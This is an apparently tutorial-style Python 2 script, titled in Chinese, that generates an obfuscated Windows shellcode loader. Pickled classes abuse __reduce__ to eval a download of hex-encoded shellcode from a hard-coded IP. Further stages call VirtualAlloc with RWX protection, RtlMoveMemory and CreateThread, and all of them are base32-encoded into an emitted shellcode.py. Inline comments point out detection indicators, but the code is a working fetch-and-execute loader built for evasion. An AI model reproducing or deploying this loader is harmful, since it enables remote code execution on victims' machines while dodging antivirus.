python生成shellcode加载器

import ctypes, cPickle, base64, urllib2

class ptr(object):
    # Stage 1 of the loader. Pickling this class stores no state: __reduce__
    # hands the unpickler the builtin `eval` plus a source string, so the
    # expression below runs inside whatever process later calls cPickle.loads
    # on the blob. The expression performs a plain-HTTP GET to a hard-coded
    # address and hex-decodes the body; an outbound fetch to a fixed IP from
    # a Python interpreter is the first observable indicator of this chain.
    def __reduce__(self):
        return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64

class buf(object):
    def __init__(self, shellcode):
        # Kept for symmetry only: __reduce__ below never reads self, so this
        # attribute is not written into the pickle at all.
        self.shellcode = shellcode

    def __reduce__(self):
        # The eval string refers to the bare global name `shellcode`, not
        # self.shellcode; it resolves in the namespace of the unpickling
        # process, which is why the emitted script assigns that global first.
        # A Python process calling kernel32.VirtualAlloc with protection 0x40
        # (PAGE_EXECUTE_READWRITE) and 0x1000 (MEM_COMMIT) is a strong signal
        # for API-monitoring and memory-scanning tooling.
        return (eval, ('ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode),0x1000,0x40)',))

class windll(object):
    def __init__(self, rwxpage, shellcode):
        # Neither attribute is consumed by __reduce__; they never reach the
        # pickle. The class name shadows nothing here but reads like
        # ctypes.windll, which is confusing when grepping the file.
        self.rwxpage = rwxpage
        self.shellcode = shellcode

    def __reduce__(self):
        # Copies the fetched bytes into the page allocated by `buf`. Both
        # `rwxpage` and `shellcode` are bare globals looked up in the
        # unpickling process, not instance attributes. The write of a
        # downloaded blob into freshly allocated executable memory is the
        # point at which memory scanners can match the payload itself.
        return (
        eval, ("ctypes.windll.kernel32.RtlMoveMemory(rwxpage,ctypes.create_string_buffer(shellcode),len(shellcode))",))

class ht(object):
    def __init__(self, rwxpage):
        # Unused by __reduce__; not serialized.
        self.rwxpage = rwxpage

    def __reduce__(self):
        # Starts a thread whose entry point is the global `rwxpage`, i.e. an
        # address inside heap-style allocated memory rather than any loaded
        # image. A thread start address outside every mapped module is a
        # classic detection for in-memory execution.
        return (eval, ("ctypes.windll.kernel32.CreateThread(0,0,rwxpage,0,0,0)",))

class run(object):
    def __init__(self, handle):
        # Unused by __reduce__; not serialized.
        self.handle = handle

    def __reduce__(self):
        # Blocks the unpickling process on the global `handle` with timeout
        # -1 (INFINITE as a DWORD), keeping the host alive while the thread
        # created by `ht` runs.
        return (eval, ("ctypes.windll.kernel32.WaitForSingleObject(handle,-1)",))

if __name__ == '__main__':
    # Each stage is wrapped as a pickle whose __reduce__ is (eval, <source>),
    # then base32-encoded so the emitted script holds only opaque blobs plus
    # cPickle.loads calls. For review purposes, cPickle/pickle.loads on
    # base32/base64 text in a script is equivalent to eval of that text.
    raw_shellcode = ptr()
    ser_shellcode = cPickle.dumps(raw_shellcode)
    enb32_shellcode = base64.b32encode(ser_shellcode)
    # NOTE: this loads runs the ptr expression in *this* process too, so
    # merely building the output already performs the HTTP fetch.
    shellcode = cPickle.loads(base64.b32decode(enb32_shellcode))

    raw_vir = buf(shellcode)
    ser_vir = cPickle.dumps(raw_vir)
    enb32_vir = base64.b32encode(ser_vir)
    # Likewise executes VirtualAlloc locally (ctypes.windll exists only on
    # Windows, so the generator itself only runs there).
    rwxpage = cPickle.loads(base64.b32decode(enb32_vir))

    # The RtlMoveMemory stage is only serialized here, never loaded locally.
    raw_rtl = windll(rwxpage, shellcode)
    ser_rtl = cPickle.dumps(raw_rtl)
    enb32_rtl = base64.b32encode(ser_rtl)

    raw_handle = ht(rwxpage)
    ser_handle = cPickle.dumps(raw_handle)
    enb32_handle = base64.b32encode(ser_handle)
    # Also executes CreateThread locally against the page allocated above.
    handle = cPickle.loads(base64.b32decode(enb32_handle))

    raw_run = run(handle)
    ser_run = cPickle.dumps(raw_run)
    enb32_run = base64.b32encode(ser_run)

    # Template of the emitted loader: five base32 blobs, each decoded and
    # unpickled in order. The globals it assigns (shellcode, rwxpage, handle)
    # are exactly the bare names the eval strings inside the pickles look up.
    output = '''import ctypes,cPickle,base64,urllib2

                e_shellcode = "{}"
                shellcode = cPickle.loads(base64.b32decode(e_shellcode))
                
                e_rwxpage="{}"
                rwxpage = cPickle.loads(base64.b32decode(e_rwxpage))
                
                e_code = "{}"
                cPickle.loads(base64.b32decode(e_code))
                
                e_handle = "{}"
                handle = cPickle.loads(base64.b32decode(e_handle))
                
                e_run = "{}"
                cPickle.loads(base64.b32decode(e_run))'''.format(enb32_shellcode, enb32_vir, enb32_rtl, enb32_handle, enb32_run)

# Written to the current working directory. This block sits outside the
# __main__ guard but depends on `output` defined inside it; the explicit
# f.close() is redundant, since `with` already closes the file on exit.
with open('shellcode.py', 'w') as f:
    f.write(output)
    f.close()

后续
